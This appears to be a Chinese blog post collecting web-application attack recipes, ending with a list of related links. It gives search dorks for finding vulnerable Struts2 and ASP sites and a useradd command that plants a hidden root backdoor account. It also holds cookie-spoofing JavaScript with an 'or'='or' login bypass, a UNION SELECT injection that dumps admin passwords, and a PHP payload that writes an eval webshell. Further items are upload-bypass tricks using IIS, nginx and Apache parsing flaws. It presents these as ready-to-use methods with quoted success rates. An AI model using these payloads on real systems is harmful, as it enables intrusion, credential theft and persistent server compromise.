php web程序漏洞,各种web程序漏洞
收集整理的各种web漏洞
struts2:
Inurl:index.action
Inurl:商城.action
Inurl:index.action 标题:apache struts2
Inurl:action?id=
site:.com inurl:index.action
inurl:dhis-web-commons
利用工具操作,账号密码添加:
useradd -u 0 -o -g root -G root -d /home/bingdao bingdao -p $1$jWIKT776$A8S37J9KR3Z4dpbJVX3rW0
账号:bingdao
密码:1
生成加密密码详情:
以下为生成加密密码命令(第一个1就是密码):
echo "1" | openssl passwd -1 -salt $(< /dev/urandom tr -dc '[:alnum:]' | head -c 32) -stdin
生成的加密密码:$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/
然后添加权限为root的账号和上面的密码:
useradd -u 0 -o -g root -G root -d /home/lengyu lengyu -p'$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/'
就得到了账号为“lengyu”,密码为“1”的用户,然后再ssh上去
------------------------------------------------------
szwyadmin cookies欺骗:
inurl:szwyadmin/login.asp
inurl:szwyadmin
代码:javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));
代码复制然后回车。。~ 方便快捷。。然后关闭网页重新打开后台地址,然后在地址栏中将login.asp改为admin_index.asp 就直接进入后台了,这种方法成功率百分之80以上。
另外这套程序还有一个爆密码的oday。
使用方法很简单。直接填写域名然后点击爆密码。~~~ 直接射出管理员帐号密码。成功率不是很理想毕竟是很多的漏洞了.
-------------------------------------------------------------------------------------------------------------------------
南方数据:
inurl:HrDemand.asp
/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
admin/southidceditor/admin_style.asp
--------------------------------------------
爆库:
inurl:conn.asp
----------------
iis6 解析漏洞:
目录解析 /xx.asp/xx.jpg
说明:在网站下建立文件夹的名字为 .asp 或 .asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。
文件解析 1.asp;.jpg
说明:会被服务器看成是1.asp还有IIS6.0 默认的可执行文件除了asp还包含这三种
/1.asa
/1.cer
/1.cdx
-----------------------------------
iis7.0/iis7.5/ nginx<8.03 畸形解析漏洞:
Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的…
在默认Fast-CGI开启状况下,黑阔上传一个名字为1.jpg,内容为
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
的文件,然后访问1.jpg/.php,在这个目录下就会生成一句话*** shell.php
------------------------------------------------------------------
Nginx <8.03 空字节代码执行漏洞:
影响版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37
Nginx在图片中嵌入PHP代码然后通过访问
xxx.jpg%00.php
来执行其中的代码
----------------
Apache 解析漏洞
Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断.
比如 wooyun.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把wooyun.php.owf.rar解析成php.
如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个wooyun.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀
---------------------------------------------------
在windows环境下,xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的,若这样命名,windows会默认除去空格或点,***可以通过抓包,在文件名后加一个空格或者点绕过黑名单.若上传成功,空格和点都会被windows自动消除,这样也可以getshell。
如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入:
SetHandler application/x-httpd-php
然后再上传shell.jpg的***, 这样shell.jpg就可解析为php文件
php web程序漏洞,各种web程序漏洞相关推荐
- Web 应用程序的十大安全漏洞
应用程序的安全性非常重要,解决安全问题的方法有很多,但一个有效的入门方法是解决 OWASP(开放 Web 应用程序安全项目)确定的十大安全问题.在本文中,我们将介绍当前应用程序的十大安全漏洞. OWA ...
- web应用程序安全工具和资源(漏洞银行 收集整理)
Web应用程序安全工具 组织 OWASP - http://www.owasp.org/ 开放式Web应用程序安全项目(OWASP)是一个501(c)3全球非营利性慈善组织,致力于提高软件的安全性 W ...
- 计算机病毒中心:大量存在漏洞的Web网站被挂马
国家计算机病毒应急处理中心通过对互联网的监测发现,近期没有重大病毒出现,但很多存在漏洞的Web网站纷纷被挂马,用户应注意防范. 专家说,恶意攻击者大多数是利用网站当前存在的漏洞进行木马程序的植入,这些 ...
- WEB应用常见15种安全漏洞一览
摘要: 安全第一! 原文:web 应用常见安全漏洞一览 作者:深予之 (@senntyou) Fundebug遵循创意共享3.0许可证转载,版权归原作者所有. 1. SQL 注入 SQL 注入就是通过 ...
- WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案
对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避 ...
- ABAP程序中的七大危险漏洞
概述 SAP的企业资源规划(ERP)系统已成为企业各项关键业务:财务管理.薪资管理.人力资源管理.供应链管理.客户关系管理等的基础平台.然而,在每个SAP的安装实施过程中,都会基于客户的需求进行不同程 ...
- php act index漏洞,浅析PHP程序中的目录遍历漏洞
这类漏洞主要是存在与基于PHP+TXT结构的程序中,漏洞代码也是来自于一个国外的BLOG,代码如下: $act=$_GET['act']:if($act==''){ include("blo ...
- 米斯特白帽培训讲义(v2)漏洞篇 Web 中间件
米斯特白帽培训讲义 漏洞篇 Web 中间件 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 简介 中间件是一种独立的系统软件或服务程序,分布式应用软件借助这种软件在不同的技术 ...
- web漏洞-SQL注入漏洞、目录遍历漏洞、文件下载漏洞
这里用到的是Pikachu漏洞练习平台 一.SQL注入漏洞-数字型注入 SQL注入漏洞简介 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库 ...
最新文章
- 深入了解Oracle前滚恢复rolling forward(一)
- fiddler不能监听 localhost和 127.0.0.1的问题 .
- 网页侧边浮动条的实现
- 计算机编程英语用语,计算机编程英语词汇
- Memcached总结
- linux服务器知识学习:linux系统centos7国内镜像下载地址
- 结构化编程:跳转控制break、continue
- leach算法的实现过程_LEACH分簇算法实现和能量控制算法实现
- android wifi驱动详解,Android wifi驱动的移植 realtek 8188
- 下载Python OpenCV相关资料方法整理
- ASP.NET MVC 开源驾校考试系统
- 时间序列数据的平稳性检验
- oracle 启用job,Oracle job启动与关闭
- EXCEL 按字符进行数据截取
- matlab符号表达式vpa,对MATLAB中符号和数值型数据以及sym(),sym(''),sym(,'d'),vpa()的理解【更新版】...
- 04、pytest跳过测试用例
- python | 基础学习(一)了解Bug、pycharm、变量、程序的三大流程(顺序、if、while)、运算符、快捷键
- 多种方法实现CT肺实质的自动分割
- ceph clock skew detected on mon
- HTML5实现Winamp2.9音频播放器插件
热门文章
- WebGL空间变换以及gl_FragCoord的运用
- python找不到vcruntimei_vcruntime140_1.dll
- TCP/UDP 区别
- 梯度爆炸与梯度消失是什么?有什么影响?如何解决?
- 程序员需要学习英语吗?
- 将qq目录下文件写如qq.txt
- Zygote进程【1】——Zygote的诞生
- 数学与计算机学院校友会,福州大学数学与计算机科学学院厦门校友会成立
- win10部署docker后无法启用VMware虚拟机
- Android 集成Face++ 人脸识别(3.0+SDK)